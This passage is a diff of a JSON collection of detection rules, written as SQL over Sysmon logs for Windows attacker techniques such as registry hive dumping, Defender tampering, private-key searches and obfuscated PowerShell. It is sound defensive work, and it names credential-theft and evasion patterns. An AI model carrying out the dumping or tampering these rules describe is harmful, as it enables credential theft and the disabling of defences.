Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "author": "sam0x90", + "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" ], "falsepositives": [ - "To be determined" + "Legitimate use of debugging tools" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_params.yml" + "filename": "proc_creation_win_lolbin_cdb.yml" }, { - "title": "Wusa Extracting Cab Files", - "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. 
This could indicate an attacker using an old technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "status": "test", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" ], "falsepositives": [ - "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "DLL Loaded via CertOC.EXE", - "id": "242301bc-f92f-4476-8718-78004a6efd9f", + "title": "Suspicious Network Command", + "id": "a29c1813-ab1f-4dde-b489-330b952e91ae", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Administrator, hotline ask to user" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' OR CommandLine LIKE '%netsh interface show interface%' ESCAPE '\\' OR CommandLine LIKE '%arp -a%' ESCAPE '\\' OR CommandLine LIKE '%nbtstat -n%' ESCAPE '\\' OR CommandLine LIKE '%net config%' ESCAPE '\\' OR CommandLine LIKE '%route print%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certoc_load_dll.yml" + "filename": "proc_creation_win_susp_network_command.yml" }, { - "title": "Private Keys Reconnaissance Via CommandLine 
Tools", - "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", - "status": "test", - "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "author": "frack113", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE 
'%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_private_keys_recon.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", + "title": "UtilityFunctions.ps1 Proxy Dll", + "id": "0403d67d-6227-4ea8-8145-4e72db7da120", "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the 
remote server has been compromise\n", + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_lolbin_utilityfunctions.yml" }, { - "title": "Potential Persistence Via Microsoft Compatibility Appraiser", - "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", "status": "experimental", - "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", - "author": "Sreeman", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 
'%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "PUA - WebBrowserPassView Execution", - "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", + "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", "status": "experimental", - "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", - "author": "frack113", + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. 
This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "@gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Web Browser Password Viewer' OR Image LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_webbrowserpassview.yml" + "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" }, { - "title": "Discovery of a System Time", - "id": "b243b280-65fe-48df-ba07-6ddea7646427", - "status": "test", - "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of the system utilities to discover system time for legitimate reason" + "Rare legitimate use by administrators to test software (should always be investigated)" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%time%' ESCAPE '\\') OR (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' AND CommandLine LIKE '%tz%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_time_discovery.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Renamed 
SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "status": "test", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy 
configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 
'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_process_hacker.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "Potential DLL Injection Or Execution Using Tracker.exe", - "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "title": "Private Keys Reconnaissance Via CommandLine Tools", + "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "status": "test", - "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" ], - "filename": "proc_creation_win_lolbin_tracker.yml" + "filename": "proc_creation_win_susp_private_keys_recon.yml" }, { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "title": "Remote Access Tool - NetSupport Execution From Unusual Location", + "id": "37e8d358-6408-4853-82f4-98333fca7014", "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", + "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' 
ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR 
Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "status": "experimental", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 